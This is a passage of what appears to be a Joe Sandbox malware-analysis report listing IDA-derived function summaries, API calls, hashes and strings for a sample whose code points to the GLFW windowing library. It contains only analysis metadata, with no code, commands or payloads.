                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Dragfree$Querycalloc$ByteCharFileFinishMultiPointWide
                                                                            • String ID:
                                                                            • API String ID: 1836115470-0
                                                                            • Opcode ID: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
                                                                            • Instruction ID: 21f17271d0a1d0e5aecf1946cead42c5bd2f030e09ed4893c2bcaf0234a1ece6
                                                                            • Opcode Fuzzy Hash: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
                                                                            • Instruction Fuzzy Hash: DF3168B4908704DFDB04EFA9C58869EFBF4FF89704F01891EE4989B250DB3498859B46
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: wcstombs$malloc$_assertfree
                                                                            • String ID:
                                                                            • API String ID: 3121319774-0
                                                                            • Opcode ID: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
                                                                            • Instruction ID: 56ca28514d4b1eca7c89cc07d14b80c7523b2de6cc68beb86310f996ff092ddc
                                                                            • Opcode Fuzzy Hash: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
                                                                            • Instruction Fuzzy Hash: DA11DDB440C7049FD300EF29C08469EFBF1EF8A654F11CA2EE59887350D7759489DB96
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,64606DDE), ref: 64606BEC
                                                                            • GetProcAddress.KERNEL32 ref: 64606C29
                                                                              • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProccallocstrcpy
                                                                            • String ID:
                                                                            • API String ID: 3191970723-0
                                                                            • Opcode ID: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
                                                                            • Instruction ID: f0646acfb52e7e7914e8e69514eb6b0ed57cf7e0ba1799fa8941cc7d4de1ebcc
                                                                            • Opcode Fuzzy Hash: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
                                                                            • Instruction Fuzzy Hash: B04118B090C3519BD716AF65D64439EBBF4EF66B48F01E85EE8848B240D77988C4CB53
                                                                            APIs
                                                                            • VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                            • VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                            • VerSetConditionMask.KERNEL32 ref: 64608747
                                                                            • RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                            • String ID: $#
                                                                            • API String ID: 2793162063-2491617062
                                                                            • Opcode ID: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
                                                                            • Instruction ID: 8ac03f99b4996b812ac9ca3971312d0a604f99c29dc6038d0a7191f675425ea0
                                                                            • Opcode Fuzzy Hash: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
                                                                            • Instruction Fuzzy Hash: 6011DAB08083089FDB10AF69C5493AEBBF4EF88354F00C85DE89887281E3B99554CF82
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp
                                                                            • String ID:
                                                                            • API String ID: 1475443563-0
                                                                            • Opcode ID: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
                                                                            • Instruction ID: df5c36a09866d2bcf33a00dd3babb0bf3a192e59e48267d6dc1dba8cacacb17f
                                                                            • Opcode Fuzzy Hash: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
                                                                            • Instruction Fuzzy Hash: 8551F5B0A08745DBEB05DF19C68479ABFF1EF95748F00C81DE8988B294E374D489DB82
                                                                            APIs
                                                                            • calloc.MSVCRT ref: 6460A359
                                                                              • Part of subcall function 64609F84: EnumDisplaySettingsW.USER32 ref: 64609FF5
                                                                              • Part of subcall function 64609F84: CreateDCW.GDI32 ref: 6460A01F
                                                                              • Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A05B
                                                                              • Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A070
                                                                              • Part of subcall function 64609F84: DeleteDC.GDI32 ref: 6460A164
                                                                              • Part of subcall function 64609F84: free.MSVCRT ref: 6460A186
                                                                              • Part of subcall function 64609F84: wcscpy.MSVCRT ref: 6460A1B4
                                                                              • Part of subcall function 64609F84: WideCharToMultiByte.KERNEL32(00000000), ref: 6460A202
                                                                            • EnumDisplayDevicesW.USER32 ref: 6460A3B9
                                                                            • EnumDisplayDevicesW.USER32 ref: 6460A41F
                                                                            • wcscmp.MSVCRT ref: 6460A469
                                                                            • wcscmp.MSVCRT ref: 6460A4ED
                                                                            • free.MSVCRT ref: 6460A565
                                                                              • Part of subcall function 646057C8: realloc.MSVCRT ref: 646057FC
                                                                              • Part of subcall function 646057C8: memmove.MSVCRT ref: 64605825
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: DisplayEnum$CapsDeviceDevicesfreewcscmp$ByteCharCreateDeleteMultiSettingsWidecallocmemmovereallocwcscpy
                                                                            • String ID:
                                                                            • API String ID: 579719053-0
                                                                            • Opcode ID: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
                                                                            • Instruction ID: dcd89fd2c13b460c3e6eb5867185efa4242b4b2248a255bf9b5c91e267a74ee1
                                                                            • Opcode Fuzzy Hash: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
                                                                            • Instruction Fuzzy Hash: A9514EB19083158FEB15DF28C94439EBBF5BFA5784F00C8ADD888A7200E776D9958F42
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassDestroyIconLongMetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 902249451-0
                                                                            • Opcode ID: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
                                                                            • Instruction ID: 713f0ba8414f9aa3487a0b640c95419bedf34daf1fda783aefc2163a129a0fcc
                                                                            • Opcode Fuzzy Hash: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
                                                                            • Instruction Fuzzy Hash: C8517A71A04205DFDB04EFA9C9486AEBBF9EF89710F01C529E898DB390DB789841CF51
                                                                            APIs
                                                                            • Sleep.KERNEL32(?,?,?,646012C1,?,?,?,?,?,?,646013D3), ref: 64601057
                                                                            • _amsg_exit.MSVCRT ref: 64601085
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep_amsg_exit
                                                                            • String ID:
                                                                            • API String ID: 1015461914-0
                                                                            • Opcode ID: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
                                                                            • Instruction ID: d62b50c69b97806eec955e296aaed03516669fdb76f59aa6d42e2eb3e52d9b3f
                                                                            • Opcode Fuzzy Hash: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
                                                                            • Instruction Fuzzy Hash: 03418F7164C290CBE716EF5AC68139B7BA0EB66748F40C52DE4848B241DB77C580CBD2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: free$calloc
                                                                            • String ID: $
                                                                            • API String ID: 3095843317-227171996
                                                                            • Opcode ID: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
                                                                            • Instruction ID: 37b25af67d1840a2031605d6addd8f798cfa9e2af2e1ac235572a749ba1644fb
                                                                            • Opcode Fuzzy Hash: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
                                                                            • Instruction Fuzzy Hash: 7041E870908718CFDB65DF29C9847D9BBF1EB89708F0088A9D59C97250D7759A88CF82
                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 6460B4B8
                                                                            • WindowFromPoint.USER32(64633B20,?,?,?,?,?,?,?,?,?,?,?,?,64633B20,?,6460E287), ref: 6460B4D4
                                                                            • GetClientRect.USER32 ref: 6460B4EE
                                                                            • ClientToScreen.USER32(00000000,00000000), ref: 6460B509
                                                                            • ClientToScreen.USER32 ref: 6460B51D
                                                                            • PtInRect.USER32 ref: 6460B532
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Client$RectScreen$CursorFromPointWindow
                                                                            • String ID:
                                                                            • API String ID: 3638364385-0
                                                                            • Opcode ID: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
                                                                            • Instruction ID: 3b0094546bf2133344687ff90385f188bb14cb557acdc0aefd7f0507a1609907
                                                                            • Opcode Fuzzy Hash: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
                                                                            • Instruction Fuzzy Hash: C711DDB5909614EFCB01EFA9D98499EBBF8FF89B11F01C429E988D7205D7309805CB61
                                                                            APIs
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                              • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                            • GetDC.USER32 ref: 6460A61D
                                                                            • GetDeviceCaps.GDI32 ref: 6460A637
                                                                            • GetDeviceCaps.GDI32 ref: 6460A649
                                                                            • ReleaseDC.USER32(73A24620,73A24620), ref: 6460A65B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$CapsDevice$InfoReleaseVerifyVersion
                                                                            • String ID: Z
                                                                            • API String ID: 1822872229-1505515367
                                                                            • Opcode ID: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
                                                                            • Instruction ID: 707d5dd32e3a15a051cc870e2508f533cae2b5a77f41d0fd4278f5d9a3e11ce2
                                                                            • Opcode Fuzzy Hash: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
                                                                            • Instruction Fuzzy Hash: 6B21D5B0908619EFDB049FAAC94879EBBF4FF49755F01C41AE89897240D7789414CF51
                                                                            Strings
                                                                            • Cannot query extension without a current OpenGL or OpenGL ES context, xrefs: 64601A43
                                                                            • JCad, xrefs: 64601ACF
                                                                            • glfw/src/context.c, xrefs: 646019F4
                                                                            • extension != NULL, xrefs: 646019FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Valuestrlenstrstr
                                                                            • String ID: Cannot query extension without a current OpenGL or OpenGL ES context$JCad$extension != NULL$glfw/src/context.c
                                                                            • API String ID: 1011161555-1144784644
                                                                            • Opcode ID: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
                                                                            • Instruction ID: ab578d73ec95341dca835a5dd6844567f22864d8ff57f30a04dc3bc4f80d642d
                                                                            • Opcode Fuzzy Hash: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
                                                                            • Instruction Fuzzy Hash: 2D3129B0A482059FD7059FA9C6446DEBFF4EF95B48F01C92EE8C88B201E7B58481CB52
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: _lock_unlockcalloc
                                                                            • String ID:
                                                                            • API String ID: 3876498383-0
                                                                            • Opcode ID: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
                                                                            • Instruction ID: 7226391e82f3ffb54ddf767a3f68459dd85a18fc98c3cf3d1ef2e38c82678296
                                                                            • Opcode Fuzzy Hash: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
                                                                            • Instruction Fuzzy Hash: 862129706082018BE700DF6CC4C079A7FE1BFAA354F54C669D4988F299EF34D841CBA2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: calloc$strncpy
                                                                            • String ID:
                                                                            • API String ID: 3831826497-3916222277
                                                                            • Opcode ID: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
                                                                            • Instruction ID: 67085ad108993bd3ce5493b9702836e3a77efd71178ef21b3a30bf35c66d437d
                                                                            • Opcode Fuzzy Hash: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
                                                                            • Instruction Fuzzy Hash: DB21D6B0908245CFDB04EF68D685A8ABBE4EF59714F41886EE8488B302D775D885CB92
                                                                            APIs
                                                                              • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B02F
                                                                              • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B03F
                                                                              • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B051
                                                                              • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B063
                                                                              • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B06F
                                                                              • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B081
                                                                              • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B092
                                                                            • MapVirtualKeyW.USER32 ref: 6460D4D6
                                                                            • GetMessageTime.USER32 ref: 6460D4F9
                                                                            • PeekMessageW.USER32 ref: 6460D528
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
